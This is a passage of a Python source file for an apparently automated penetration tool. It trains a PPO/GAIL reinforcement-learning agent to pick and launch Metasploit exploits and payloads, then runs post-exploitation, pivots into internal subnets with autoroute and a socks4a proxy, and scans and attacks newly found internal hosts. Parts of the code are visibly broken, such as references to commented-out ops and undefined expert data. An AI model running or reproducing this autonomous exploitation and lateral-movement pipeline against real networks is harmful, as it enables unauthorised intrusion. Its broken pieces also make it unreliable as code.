r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' 1592 | temp_subnet = self.cutting_strings(regex_pattern, data) 1593 | try: 1594 | subnets = temp_subnet[0].split('/') 1595 | return [subnets[0], subnets[1]] 1596 | except Exception as e: 1597 | self.util.print_exception(e, 'Failed: {}'.format(cmd)) 1598 | return ['.'.join(internal_ip.split('.')[:3]) + '.0', '255.255.255.0'] 1599 | else: 1600 | self.util.print_message(WARNING, '"{}" is failure.'.format(cmd)) 1601 | return ['.'.join(internal_ip.split('.')[:3]) + '.0', '255.255.255.0'] 1602 | 1603 | # Set pivoting using autoroute. 1604 | def set_pivoting(self, session_id, ip_list): 1605 | # Get subnet of target internal network. 1606 | temp_subnet = [] 1607 | for internal_ip in ip_list: 1608 | # Execute an autoroute command. 1609 | temp_subnet.append(self.get_subnet(session_id, internal_ip)) 1610 | 1611 | # Execute autoroute. 1612 | for subnet in list(map(list, set(map(tuple, temp_subnet)))): 1613 | cmd = 'run autoroute -s ' + subnet[0] + ' ' + subnet[1] + '\n' 1614 | _ = self.client.execute_meterpreter(session_id, cmd) 1615 | time.sleep(3.0) 1616 | _ = self.client.execute_meterpreter(session_id, 'run autoroute -p\n') 1617 | 1618 | 1619 | # Constants of LocalBrain 1620 | MIN_BATCH = 5 1621 | LOSS_V = .05 # v loss coefficient 1622 | LOSS_ENTROPY = .001 # entropy coefficient 1623 | LEARNING_RATE = 1e-4 1624 | RMSPropDecaly = 0.99 1625 | 1626 | # Params of advantage (Bellman equation) 1627 | GAMMA = 0.95 1628 | N_STEP_RETURN = 5 1629 | GAMMA_N = GAMMA ** N_STEP_RETURN 1630 | clip_value = 0.2 1631 | c_1 = 0.1 1632 | c_2 = 0.01 1633 | TRAIN_WORKERS = 10 # Thread number of learning. 1634 | TEST_WORKER = 1 # Thread number of testing (default 1) 1635 | MAX_STEPS = 30 # Maximum step number. 
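# Reference sketch (not used by the agent itself): GAMMA_N = GAMMA ** N_STEP_RETURN is the
# bootstrap factor of the n-step return
#     R_t = r_t + GAMMA * r_{t+1} + ... + GAMMA^(N-1) * r_{t+N-1} + GAMMA_N * V(s_{t+N}).
# The helper spells that out explicitly; Agent.advantage_push_local_brain() and
# LocalBrain.update_parameter_server() build the same quantity incrementally.
def _n_step_return_example(rewards, bootstrap_value, gamma=GAMMA):
    """Return r_0 + gamma*r_1 + ... + gamma^(n-1)*r_{n-1} + gamma^n * V(s_n)."""
    ret = 0.0
    for i, r in enumerate(rewards):
        ret += (gamma ** i) * r
    return ret + (gamma ** len(rewards)) * bootstrap_value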
1636 | MAX_TRAIN_NUM = 100000 # Learning number of each thread. 1637 | Tmax = 5 # Updating step period of each thread. 1638 | EPSILON = 0.2 1639 | # Params of epsilon greedy 1640 | EPS_START = 0.5 1641 | EPS_END = 0.0 1642 | 1643 | 1644 | # ParameterServer 1645 | class ParameterServer: 1646 | def __init__(self): 1647 | # Identify by name to weights by the thread name (Name Space). 1648 | with tf.variable_scope("parameter_server"): 1649 | # Define neural network. 1650 | self.model = self._build_model() 1651 | 1652 | # Declare server params. 1653 | self.weights_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="parameter_server") 1654 | # Define optimizer. 1655 | self.optimizer = tf.train.RMSPropOptimizer(LEARNING_RATE, RMSPropDecaly) 1656 | 1657 | # Define neural network. 1658 | def _build_model(self): 1659 | l_input = Input(batch_shape=(None, NUM_STATES)) 1660 | l_dense1 = Dense(50, activation='relu')(l_input) 1661 | l_dense2 = Dense(100, activation='relu')(l_dense1) 1662 | l_dense3 = Dense(200, activation='relu')(l_dense2) 1663 | #l_dense4 = Dense(400, activation='relu')(l_dense3) 1664 | out_actions = Dense(NUM_ACTIONS, activation='softmax')(l_dense3) 1665 | out_value = Dense(1, activation='linear')(l_dense3) 1666 | model = Model(inputs=[l_input], outputs=[out_actions, out_value]) 1667 | return model 1668 | 1669 | class Discriminator: 1670 | def __init__(self): 1671 | with tf.variable_scope('discriminator'): 1672 | self.scope = tf.get_variable_scope().name 1673 | self.expert_s = tf.placeholder(dtype=tf.float32, shape=[None] + list((5,))) 1674 | self.expert_a = tf.placeholder(dtype=tf.float32, shape=[None, 593]) 1675 | expert_a_one_hot = self.expert_a 1676 | # add noise for stabilise training 1677 | expert_a_one_hot += tf.random_normal(tf.shape(expert_a_one_hot), mean=0.2, stddev=0.1, dtype=tf.float32)/1.2 1678 | expert_s_a = tf.concat([self.expert_s, expert_a_one_hot], axis=1) 1679 | self.s_t = tf.placeholder(dtype=tf.float32, shape=[None] + list((5,))) 1680 | self.a_t = tf.placeholder(dtype=tf.float32, shape=(None, 593)) 1681 | agent_a_one_hot = self.a_t 1682 | # add noise for stabilise training 1683 | agent_a_one_hot += tf.random_normal(tf.shape(agent_a_one_hot), mean=0.2, stddev=0.1, dtype=tf.float32) / 1.2 1684 | agent_s_a = tf.concat([self.s_t, agent_a_one_hot], axis=1) 1685 | 1686 | with tf.variable_scope('network') as network_scope: 1687 | prob_1 = self.construct_network(input=expert_s_a) 1688 | network_scope.reuse_variables() # share parameter 1689 | prob_2 = self.construct_network(input=agent_s_a) 1690 | 1691 | with tf.variable_scope('loss'): 1692 | loss_expert = tf.reduce_mean(tf.log(tf.clip_by_value(prob_1, 0.01, 1))) 1693 | loss_agent = tf.reduce_mean(tf.log(tf.clip_by_value(1 - prob_2, 0.01, 1))) 1694 | loss = loss_expert + loss_agent 1695 | loss = -loss 1696 | tf.summary.scalar('discriminator', loss) 1697 | with tf.variable_scope("Opt", reuse=tf.AUTO_REUSE): 1698 | optimizer = tf.train.AdamOptimizer() 1699 | self.train_op = optimizer.minimize(loss) 1700 | 1701 | self.rewards = tf.log(tf.clip_by_value(prob_2, 1e-10, 1)) # log(P(expert|s,a)) larger is better for agent 1702 | 1703 | def train(self, expert_s, expert_a, s, a): 1704 | return SESS.run(self.train_op, feed_dict={self.expert_s: expert_s, 1705 | self.expert_a: expert_a, 1706 | self.s_t: s, 1707 | self.a_t: a}) 1708 | 1709 | def get_rewards(self, s, a): 1710 | return SESS.run(self.rewards, feed_dict={self.s_t: s, 1711 | self.a_t: a}) 1712 | def construct_network(self, input): 1713 | with 
tf.variable_scope("pro", reuse=tf.AUTO_REUSE): 1714 | layer_1 = tf.layers.dense(inputs=input, units=50, activation=tf.nn.leaky_relu, name='layer1') 1715 | layer_2 = tf.layers.dense(inputs=layer_1, units=100, activation=tf.nn.leaky_relu, name='layer2') 1716 | layer_3 = tf.layers.dense(inputs=layer_2, units=200, activation=tf.nn.leaky_relu, name='layer3') 1717 | prob = tf.layers.dense(inputs=layer_3, units=1, activation=tf.sigmoid, name='prob') 1718 | return prob 1719 | 1720 | # LocalBrain 1721 | class LocalBrain: 1722 | def __init__(self, name, parameter_server): 1723 | self.util = Utilty() 1724 | self.model_old = self._build_model() 1725 | self.discriminator = Discriminator() 1726 | with tf.name_scope(name): 1727 | # s, a, r, s', s' terminal mask 1728 | self.train_queue = [[], [], [], [], []] 1729 | K.set_session(SESS) 1730 | 1731 | # Define neural network. 1732 | self.model = self._build_model() 1733 | # Define learning method. 1734 | self._build_graph(name, parameter_server) 1735 | 1736 | # Define neural network. 1737 | def _build_model(self): 1738 | l_input = Input(batch_shape=(None, NUM_STATES)) 1739 | l_dense1 = Dense(50, activation='relu')(l_input) 1740 | l_dense2 = Dense(100, activation='relu')(l_dense1) 1741 | l_dense3 = Dense(200, activation='relu')(l_dense2) 1742 | # l_dense4 = Dense(400, activation='relu')(l_dense3) 1743 | self.s_t = tf.placeholder(dtype=tf.float32, shape=(None, NUM_STATES), name='states') 1744 | self.out_actions = Dense(NUM_ACTIONS, activation='softmax')(l_dense3) # policy net 1745 | self.out_value = Dense(1, activation='linear')(l_dense3) # value net 1746 | model = Model(inputs=[l_input], outputs=[self.out_actions, self.out_value]) 1747 | # Have to initialize before threading 1748 | model._make_predict_function() 1749 | return model 1750 | 1751 | # self.act_stochastic = tf.multinomial(tf.log(self.out_actions), num_samples=1) 1752 | # self.act_stochastic = tf.reshape(self.act_stochastic, shape=[-1]) # 随机动作 1753 | # 1754 | # self.act_deterministic = tf.argmax(self.out_actions, axis=1) # 输出确定的动作 取最大 1755 | # self.scope = tf.get_variable_scope().name 1756 | 1757 | # Define neural network. 
1758 |     def _build_graph(self, name, parameter_server):
1759 |         # self.s_t = tf.placeholder(tf.float32, shape=(None, NUM_STATES), name='states')
1760 |         self.a_t = tf.placeholder(tf.int32, shape=(None, NUM_ACTIONS), name='actions')
1761 |         self.out_value_next = tf.placeholder(dtype=tf.float32, shape=[None] + list((1,)), name='out_value_next')
1762 |         self.gaes = tf.placeholder(dtype=tf.float32, shape=[None] + list((1,)), name='gaes')
1763 |         # Not immediate, but discounted n-step reward.
1764 |         self.r_t = tf.placeholder(tf.float32, shape=(None, 1), name='rewards')
1765 | 
1766 |         out_actions_old, out_value_old = self.model_old(self.s_t)
1767 |         self.model_old.set_weights(self.model.get_weights())
1768 | 
1769 |         out_actions_all, out_value = self.model(self.s_t)
1770 | 
1771 |         # Probability of the action which the agent took with the current policy (mask with the one-hot a_t).
1772 |         # out_actions = out_actions * tf.one_hot(indices=self.a_t, depth=out_actions.shape[1])
1773 |         out_actions = tf.reduce_sum(out_actions_all * tf.cast(self.a_t, tf.float32), axis=1)
1774 | 
1775 |         # Probability of the action which the agent took with the old policy.
1776 |         # out_actions_old = out_actions_old * tf.one_hot(indices=self.a_t, depth=out_actions_old.shape[1])
1777 |         out_actions_old = tf.reduce_sum(out_actions_old * tf.cast(self.a_t, tf.float32), axis=1)
1778 | 
1779 |         with tf.variable_scope('loss'):
1780 |             # Construct computation graph for loss_clip.
1781 |             # ratios = tf.divide(act_probs, act_probs_old)
1782 |             ratios = tf.exp(tf.log(tf.clip_by_value(out_actions, 1e-10, 1.0))
1783 |                             - tf.log(tf.clip_by_value(out_actions_old, 1e-10, 1.0)))
1784 |             clipped_ratios = tf.clip_by_value(ratios, clip_value_min=1 - clip_value, clip_value_max=1 + clip_value)
1785 |             loss_clip = tf.minimum(tf.multiply(tf.squeeze(self.gaes, axis=1), ratios), tf.multiply(tf.squeeze(self.gaes, axis=1), clipped_ratios))
1786 |             loss_clip = tf.reduce_mean(loss_clip)
1787 |             tf.summary.scalar('loss_clip', loss_clip)
1788 | 
1789 |             # Construct computation graph for the entropy bonus (uses the full action distribution).
1790 |             entropy = -tf.reduce_sum(out_actions_all *
1791 |                                      tf.log(tf.clip_by_value(out_actions_all, 1e-10, 1.0)), axis=1)
1792 |             entropy = tf.reduce_mean(entropy)  # mean of entropy of pi(obs)
1793 |             tf.summary.scalar('entropy', entropy)
1794 | 
1795 |             # Construct computation graph for the value function loss.
1796 |             # Value target: r_t + GAMMA * V(s_{t+1}); the bootstrap value V(s_{t+1}) is fed via out_value_next.
1797 | 
1798 | 
1799 |             loss_vf = tf.squared_difference(self.r_t + GAMMA * self.out_value_next, out_value)
1800 |             loss_vf = tf.reduce_mean(loss_vf)
1801 |             tf.summary.scalar('value_difference', loss_vf)
1802 | 
1803 |             # Construct computation graph for the total loss.
1804 |             loss = loss_clip - c_1 * loss_vf + c_2 * entropy
1805 | 
1806 |             # Minimizing self.loss (= -loss) maximizes the PPO objective.
1807 |             self.loss = -loss
1808 |             tf.summary.scalar('total', loss)
1809 | 
1810 |         self.merged = tf.summary.merge_all()
1811 |         with tf.variable_scope("Opt", reuse=tf.AUTO_REUSE):
1812 |             optimizer = tf.train.AdamOptimizer(learning_rate=5e-5, epsilon=1e-5)
1813 |             self.gradients = optimizer.compute_gradients(self.loss)  # var_list=self.pi_trainable)
1814 |             self.train_op = optimizer.minimize(self.loss)  # var_list=self.pi_trainable)
1815 | 
1816 |         # Define weight.
1817 |         self.weights_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=name)
1818 |         self.old_weights_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=name)
1819 |         # Define grads.
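        # The ops defined below follow the A3C-style parameter sharing scheme:
        #   - self.grads: gradients of the local loss w.r.t. this worker's weights.
        #   - update_global_weight_params: applies those gradients to the shared
        #     ParameterServer weights through its RMSProp optimizer.
        #   - pull_global_weight_params / push_local_weight_params: copy weights between
        #     the ParameterServer and this worker thread.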
1820 |         self.grads_actor = tf.gradients(loss_clip, self.weights_params)
1821 |         self.grads = tf.gradients(self.loss, self.weights_params)
1822 | 
1823 |         # Define updating weight of ActorNet.
1824 |         self.update_actor_weight_params = [l_p.assign(g_p)
1825 |                                            for l_p, g_p in zip(self.old_weights_params, self.weights_params)]
1826 |         # Define updating weight of ParameterServer.
1827 |         self.update_global_weight_params = \
1828 |             parameter_server.optimizer.apply_gradients(zip(self.grads, parameter_server.weights_params))
1829 | 
1830 |         # Define copying weight of ParameterServer to LocalBrain (copy the main thread's parameters to this worker thread).
1831 |         self.pull_global_weight_params = [l_p.assign(g_p)
1832 |                                           for l_p, g_p in zip(self.weights_params, parameter_server.weights_params)]
1833 | 
1834 |         # Define copying weight of LocalBrain to ParameterServer (copy this worker thread's parameters to the main thread).
1835 |         self.push_local_weight_params = [g_p.assign(l_p)
1836 |                                          for g_p, l_p in zip(parameter_server.weights_params, self.weights_params)]
1837 | 
1838 |     # Pull ParameterServer weight to local thread.
1839 |     def pull_parameter_server(self):
1840 |         SESS.run(self.pull_global_weight_params)
1841 | 
1842 |     # Push local thread weight to ParameterServer.
1843 |     def push_parameter_server(self):
1844 |         SESS.run(self.push_local_weight_params)
1845 | 
1846 | 
1847 |     def get_trainable_variables(self):
1848 |         return tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, self.scope)
1849 |     # Updating weight using grads of LocalBrain (learning).
1850 |     def update_parameter_server(self):
1851 |         if len(self.train_queue[0]) < MIN_BATCH:
1852 |             return
1853 | 
1854 |         self.util.print_message(NOTE, 'Update LocalBrain weight to ParameterServer.')
1855 |         print('update_local_weight_count = {}'.format(update_local_weight_count))  # Debug: global update counter.
1856 |         s, a, r, s_, s_mask = self.train_queue
1857 |         self.train_queue = [[], [], [], [], []]
1858 |         s = np.vstack(s)
1859 |         a = np.vstack(a)
1860 |         r = np.vstack(r)
1861 | 
1862 |         s_ = np.vstack(s_)
1863 |         s_mask = np.vstack(s_mask)
1864 |         _, v = self.model.predict(s_)
1865 |         v = np.vstack(v)
1866 |         # Set v to 0 where s_ is a terminal state (applied below via "r = r + GAMMA_N * v * s_mask").
1867 | 
1868 |         for i in range(2):
1869 |             self.discriminator.train(expert_s=expert_s,
1870 |                                      expert_a=expert_a,
1871 |                                      s=s,
1872 |                                      a=a)
1873 |         d_rewards = self.discriminator.get_rewards(s=s, a=a)
1874 |         v_next = np.vstack((v[1:], np.zeros((1, 1))))  # Value after the last sample is assumed to be 0.
1875 |         deltas = [r_d + GAMMA * v_n - v_c for r_d, v_n, v_c in zip(d_rewards, v_next, v)]
1876 |         # Calculate generalized advantage estimator (lambda = 1), see PPO paper eq. (11).
1877 |         gaes = copy.deepcopy(deltas)
1878 |         for t in reversed(range(len(gaes) - 1)):  # t is T-1, where T is the time step at which the policy ran.
1879 |             gaes[t] = gaes[t] + GAMMA * gaes[t + 1]
1880 |         gaes = np.array(gaes)
1881 |         # gaes = (gaes - gaes.mean()) / gaes.std()
1882 |         r = r + GAMMA_N * v * s_mask
1883 |         feed_dict = {self.s_t: s, self.a_t: a, self.r_t: d_rewards, self.out_value_next: v_next, self.gaes: gaes}  # Data for updating weights.
1884 |         inp = [s, a, gaes, d_rewards, v_next]
1885 |         SESS.run(self.update_actor_weight_params, feed_dict)  # Update actor weight.
1886 |         # train
1887 |         # for epoch in range(6):
1888 |         #     # sample indices from [low, high)
1889 |         #     sample_indices = np.random.randint(low=0, high=s.shape[0], size=32)
1890 |         #     sampled_inp = [np.take(a=a, indices=sample_indices, axis=0) for a in inp]  # sample training data
1891 |         #     self.train(s=sampled_inp[0],
1892 |         #                a=sampled_inp[1],
1893 |         #                gaes=sampled_inp[2],
1894 |         #                r=sampled_inp[3],
1895 |         #                out_value_next=sampled_inp[4])
1896 |         SESS.run(self.update_global_weight_params, feed_dict)  # Update ParameterServer weight.
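        # Note on the update above: in this GAIL setup the environment reward is replaced by
        # the discriminator signal d_rewards = log(D(s, a)); the more expert-like the agent's
        # (s, a) pairs look, the larger the reward. The advantages fed through 'gaes' are the
        # GAMMA-discounted sums of the TD residuals
        #     delta_t = d_reward_t + GAMMA * V(s_{t+1}) - V(s_t)      (lambda = 1),
        # which is what the clipped surrogate loss in _build_graph() consumes.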
1897 |         loss = SESS.run(self.loss, feed_dict)
1898 |         writer.add_summary(tf.Summary(value=[tf.Summary.Value(tag='loss', simple_value=loss)]), update_local_weight_count)
1899 | 
1900 |     def act(self, s, stochastic=True):  # NOTE: depends on the act_stochastic/act_deterministic ops that are commented out in _build_model.
1901 |         if stochastic:
1902 |             return SESS.run([self.act_stochastic, self.out_value], feed_dict={self.s_t: s})
1903 |         else:
1904 |             return SESS.run([self.act_deterministic, self.out_value], feed_dict={self.s_t: s})
1905 | 
1906 | 
1907 |     def get_variables(self):
1908 |         return tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, self.scope)
1909 | 
1910 |     def get_trainable_variables(self):
1911 |         return tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, self.scope)
1912 | 
1913 |     def train(self, s, a, gaes, r, out_value_next):
1914 |         SESS.run(self.train_op, feed_dict={
1915 |             self.s_t: s,
1916 |             self.a_t: a,
1917 |             self.r_t: r,
1918 |             self.out_value_next: out_value_next,
1919 |             self.gaes: gaes})
1920 | 
1921 | 
1922 |     def get_grad(self, s, a, gaes, r, out_value_next):
1923 |         return SESS.run(self.gradients, feed_dict={self.s_t: s,
1924 |                                                    self.a_t: a,
1925 |                                                    self.r_t: r,
1926 |                                                    self.out_value_next: out_value_next,
1927 |                                                    self.gaes: gaes})
1928 | 
1929 | 
1930 |     # Return probability of each action for state (s).
1931 |     def predict_p(self, s):  # p corresponds to out_actions (the policy head).
1932 |         p, v = self.model.predict(s)
1933 |         return p
1934 | 
1935 |     def predict_p_old(self, s):
1936 |         p_old, v_old = self.model_old.predict(s)
1937 |         return p_old
1938 | 
1939 |     def train_push(self, s, a, r, s_):
1940 |         self.train_queue[0].append(s)
1941 |         self.train_queue[1].append(a)
1942 |         self.train_queue[2].append(r)
1943 | 
1944 |         if s_ is None:
1945 |             self.train_queue[3].append(NONE_STATE)
1946 |             self.train_queue[4].append(0.)
1947 |         else:
1948 |             self.train_queue[3].append(s_)
1949 |             self.train_queue[4].append(1.)
1950 | 
1951 | 
1952 | # Agent
1953 | class Agent:
1954 |     def __init__(self, name, parameter_server):
1955 |         self.brain = LocalBrain(name, parameter_server)
1956 |         self.memory = []            # Memory of s,a,r,s_
1957 |         self.R = 0.                 # Time discounted total reward.
1958 | 
1959 |     def act(self, s, available_action_list, eps_steps):
1960 |         # Decide action using epsilon greedy.
1961 |         if frames >= eps_steps:
1962 |             eps = EPS_END
1963 |         else:
1964 |             # Linearly interpolate.
1965 |             eps = EPS_START + frames * (EPS_END - EPS_START) / eps_steps
1966 | 
1967 |         if random.random() < eps:
1968 |             # Randomly select action.
1969 |             if len(available_action_list) != 0:
1970 |                 return available_action_list[random.randint(0, len(available_action_list) - 1)], None, None
1971 |             else:
1972 |                 return 'no payload', None, None
1973 |         else:
1974 |             # Select action according to probability p[0] (greedy).
1975 |             s = np.array([s])
1976 |             p = self.brain.predict_p(s)
1977 |             if len(available_action_list) != 0:
1978 |                 prob = []
1979 |                 for action in available_action_list:
1980 |                     prob.append([action, p[0][action]])
1981 |                 prob.sort(key=lambda s: -s[1])
1982 |                 return prob[0][0], prob[0][1], prob
1983 |             else:
1984 |                 return 'no payload', p[0][len(p[0]) - 1], None
1985 | 
1986 |     # Push s,a,r,s_ considering advantage to LocalBrain.
1987 |     def advantage_push_local_brain(self, s, a, r, s_):
1988 |         def get_sample(memory, n):
1989 |             s, a, _, _ = memory[0]
1990 |             _, _, _, s_ = memory[n - 1]
1991 |             return s, a, self.R, s_
1992 | 
1993 |         # Create a_cats (one-hot encoding).
1994 |         a_cats = np.zeros(NUM_ACTIONS)
1995 |         a_cats[a] = 1
1996 |         self.memory.append((s, a_cats, r, s_))
1997 | 
1998 |         # Calculate R using the previous time-discounted total reward.
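        # self.R maintains a sliding n-step return over the last N_STEP_RETURN transitions:
        # dividing by GAMMA and adding r * GAMMA_N shifts the window forward by one step, so
        # that once the memory holds N_STEP_RETURN samples, R equals
        # r_0 + GAMMA*r_1 + ... + GAMMA^(N-1)*r_{N-1}; the oldest reward is subtracted below
        # when that sample is pushed to the LocalBrain and popped from the memory.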
1999 | self.R = (self.R + r * GAMMA_N) / GAMMA 2000 | 2001 | # Input experience considering advantage to LocalBrain. 2002 | if s_ is None: 2003 | while len(self.memory) > 0: 2004 | n = len(self.memory) 2005 | s, a, r, s_ = get_sample(self.memory, n) 2006 | self.brain.train_push(s, a, r, s_) 2007 | self.R = (self.R - self.memory[0][2]) / GAMMA 2008 | self.memory.pop(0) 2009 | 2010 | self.R = 0 2011 | 2012 | if len(self.memory) >= N_STEP_RETURN: 2013 | s, a, r, s_ = get_sample(self.memory, N_STEP_RETURN) 2014 | self.brain.train_push(s, a, r, s_) 2015 | self.R = self.R - self.memory[0][2] 2016 | self.memory.pop(0) 2017 | 2018 | 2019 | # Environment. 2020 | class Environment: 2021 | total_reward_vec = np.zeros(10) 2022 | count_trial_each_thread = 0 2023 | 2024 | def __init__(self, name, thread_type, parameter_server, rhost): 2025 | self.name = name 2026 | self.thread_type = thread_type 2027 | self.env = Metasploit(rhost) 2028 | self.agent = Agent(name, parameter_server) 2029 | self.util = Utilty() 2030 | 2031 | def run(self, exploit_tree, target_tree): 2032 | self.agent.brain.pull_parameter_server() # Copy ParameterSever weight to LocalBrain 2033 | global frames # Total number of trial in total session. 2034 | global isFinish # Finishing of learning/testing flag. 2035 | global exploit_count # Number of successful exploitation. 2036 | global post_exploit_count # Number of successful post-exploitation. 2037 | global plot_count # Exploitation count list for plot. 2038 | global plot_pcount # Post-exploit count list for plot. 2039 | global update_local_weight_count 2040 | if self.thread_type == 'test': 2041 | # Execute exploitation. 2042 | self.util.print_message(NOTE, 'Execute exploitation.') 2043 | session_list = [] 2044 | for port_num in com_port_list: 2045 | execute_list = [] 2046 | target_info = {} 2047 | module_list = target_tree[port_num]['exploit'] 2048 | for exploit in module_list: 2049 | target_list = exploit_tree[exploit[8:]]['target_list'] 2050 | for target in target_list: 2051 | skip_flag, s, payload_list, target_info = self.env.get_state(exploit_tree, 2052 | target_tree, 2053 | port_num, 2054 | exploit, 2055 | target) 2056 | if skip_flag is False: 2057 | # Get available payload index. 2058 | available_actions = self.env.get_available_actions(payload_list) 2059 | 2060 | # Decide action using epsilon greedy. 2061 | frames = self.env.eps_steps 2062 | _, _, p_list = self.agent.act(s, available_actions, self.env.eps_steps) 2063 | # Append all payload probabilities. 2064 | if p_list is not None: 2065 | for prob in p_list: 2066 | execute_list.append([prob[1], exploit, target, prob[0], target_info]) 2067 | else: 2068 | continue 2069 | 2070 | # Execute action. 2071 | execute_list.sort(key=lambda s: -s[0]) 2072 | for idx, exe_info in enumerate(execute_list): 2073 | # Execute exploit. 2074 | _, _, done, sess_info = self.env.execute_exploit(exe_info[3], 2075 | self.name, 2076 | self.thread_type, 2077 | exe_info[2], 2078 | exe_info[4], 2079 | idx, 2080 | exploit_tree) 2081 | 2082 | # Store session information. 2083 | if len(sess_info) != 0: 2084 | session_list.append(sess_info) 2085 | 2086 | # Change port number for next exploitation. 2087 | if done is True: 2088 | break 2089 | 2090 | # Execute post exploitation. 
2091 | new_target_list = [] 2092 | for session in session_list: 2093 | self.util.print_message(NOTE, 'Execute post exploitation.') 2094 | self.util.print_message(OK, 'Target session info.\n' 2095 | ' session id : {0}\n' 2096 | ' session type : {1}\n' 2097 | ' target port : {2}\n' 2098 | ' exploit : {3}\n' 2099 | ' target : {4}\n' 2100 | ' payload : {5}'.format(session['id'], 2101 | session['type'], 2102 | session['port'], 2103 | session['exploit'], 2104 | session['target'], 2105 | session['payload'])) 2106 | internal_ip_list = self.env.execute_post_exploit(session['id'], session['type']) 2107 | for ip_addr in internal_ip_list: 2108 | if ip_addr not in self.env.prohibited_list and ip_addr != self.env.rhost: 2109 | new_target_list.append(ip_addr) 2110 | else: 2111 | self.util.print_message(WARNING, 'Target IP={} is prohibited.'.format(ip_addr)) 2112 | 2113 | # Deep penetration. 2114 | new_target_list = list(set(new_target_list)) 2115 | if len(new_target_list) != 0: 2116 | # Launch Socks4a proxy. 2117 | module = 'auxiliary/server/socks4a' 2118 | self.util.print_message(NOTE, 'Set proxychains: SRVHOST={}, SRVPORT={}'.format(self.env.proxy_host, 2119 | str(self.env.proxy_port))) 2120 | option = {'SRVHOST': self.env.proxy_host, 'SRVPORT': self.env.proxy_port} 2121 | job_id, uuid = self.env.client.execute_module('auxiliary', module, option) 2122 | if uuid is None: 2123 | self.util.print_message(FAIL, 'Failure executing module: {}'.format(module)) 2124 | isFinish = True 2125 | return 2126 | 2127 | # Further penetration. 2128 | self.env.source_host = self.env.rhost 2129 | self.env.prohibited_list.append(self.env.rhost) 2130 | self.env.isPostExploit = True 2131 | self.deep_run(new_target_list) 2132 | 2133 | isFinish = True 2134 | else: 2135 | # Execute learning. 2136 | skip_flag, s, payload_list, target_list, target_info = self.env.reset_state(exploit_tree, target_tree) 2137 | 2138 | # If product name is 'unknown', skip. 2139 | if skip_flag is False: 2140 | R = 0 2141 | step = 0 2142 | while True: 2143 | # Decide action (randomly or epsilon greedy). 2144 | available_actions = self.env.get_available_actions(payload_list) 2145 | a, _, _ = self.agent.act(s, available_actions, self.env.eps_steps) 2146 | # Execute action. 2147 | s_, r, done, _ = self.env.execute_exploit(a, 2148 | self.name, 2149 | self.thread_type, 2150 | target_list, 2151 | target_info, 2152 | step, 2153 | exploit_tree, 2154 | frames) 2155 | step += 1 2156 | 2157 | # Update payload list according to new target. 2158 | payload_list = exploit_tree[target_info['exploit']]['targets'][str(self.env.state[ST_TARGET])] 2159 | 2160 | # If trial exceed maximum number of trials at current episode, 2161 | # finish trial at current episode. 2162 | if step > MAX_STEPS: 2163 | done = True 2164 | 2165 | # Increment frame number. 2166 | frames += 1 2167 | 2168 | # Increment number of successful exploitation. 2169 | if r == R_GOOD: 2170 | exploit_count += 1 2171 | 2172 | # Increment number of successful post-exploitation. 2173 | if r == R_GREAT: 2174 | exploit_count += 1 2175 | post_exploit_count += 1 2176 | 2177 | # Plot number of successful post-exploitation each 100 frames. 2178 | if frames % 100 == 0: 2179 | self.util.print_message(NOTE, 'Plot number of successful post-exploitation.') 2180 | plot_count.append(exploit_count) 2181 | plot_pcount.append(post_exploit_count) 2182 | exploit_count = 0 2183 | post_exploit_count = 0 2184 | 2185 | # Push reward and experience considering advantage.to LocalBrain. 
2186 | if a == 'no payload': 2187 | a = len(com_payload_list) - 1 2188 | self.agent.advantage_push_local_brain(s, a, r, s_) 2189 | 2190 | s = s_ 2191 | R += r 2192 | # Copy updating ParameterServer weight each Tmax. 2193 | if done or (step % Tmax == 0): 2194 | if not (isFinish): 2195 | 2196 | self.agent.brain.update_parameter_server() 2197 | update_local_weight_count += 1 2198 | self.agent.brain.push_parameter_server() 2199 | 2200 | if done: 2201 | # Discard the old total reward and keep the latest 10 pieces. 2202 | self.total_reward_vec = np.hstack((self.total_reward_vec[1:], step)) 2203 | # Increment total trial number of thread. 2204 | self.count_trial_each_thread += 1 2205 | break 2206 | REWARDS.append(r) 2207 | writer.add_summary(tf.Summary(value=[tf.Summary.Value(tag='episode_reward', simple_value=sum(REWARDS))]), frames) 2208 | # Output total number of trials, thread name, current reward to console. 2209 | self.util.print_message(OK, 'Thread: {}, Trial num: {}, ' 2210 | 'Step: {}, Avg step: {}'.format(self.name, 2211 | str(self.count_trial_each_thread), 2212 | str(step), 2213 | str(self.total_reward_vec.mean()))) 2214 | 2215 | # End of learning. 2216 | if frames > MAX_TRAIN_NUM: 2217 | self.util.print_message(OK, 'Finish train:{}'.format(self.name)) 2218 | isFinish = True 2219 | self.util.print_message(OK, 'Stopping learning...') 2220 | time.sleep(30.0) 2221 | # Push params of thread to ParameterServer. 2222 | self.agent.brain.pull_parameter_server() 2223 | 2224 | # Further penetration. 2225 | def deep_run(self, target_ip_list): 2226 | for target_ip in target_ip_list: 2227 | result_file = 'nmap_result_' + target_ip + '.xml' 2228 | command = self.env.nmap_2nd_command + ' ' + result_file + ' ' + target_ip + '\n' 2229 | self.env.execute_nmap(target_ip, command, self.env.nmap_2nd_timeout) 2230 | com_port_list, proto_list, info_list = self.env.get_port_list(result_file, target_ip) 2231 | 2232 | # Get exploit tree and target info. 2233 | exploit_tree = self.env.get_exploit_tree() 2234 | target_tree = self.env.get_target_info(target_ip, proto_list, info_list) 2235 | 2236 | # Execute exploitation. 2237 | self.env.rhost = target_ip 2238 | self.run(exploit_tree, target_tree) 2239 | 2240 | 2241 | # WorkerThread 2242 | class Worker_thread: 2243 | def __init__(self, thread_name, thread_type, parameter_server, rhost): 2244 | self.environment = Environment(thread_name, thread_type, parameter_server, rhost) 2245 | self.thread_name = thread_name 2246 | self.thread_type = thread_type 2247 | self.util = Utilty() 2248 | 2249 | # Execute learning or testing. 2250 | def run(self, exploit_tree, target_tree, saver=None, train_path=None): 2251 | self.util.print_message(NOTE, 'Executing start: {}'.format(self.thread_name)) 2252 | while True: 2253 | if self.thread_type == 'learning': 2254 | # Execute learning thread. 2255 | self.environment.run(exploit_tree, target_tree) 2256 | 2257 | # Stop learning thread. 2258 | if isFinish: 2259 | self.util.print_message(OK, 'Finish train: {}'.format(self.thread_name)) 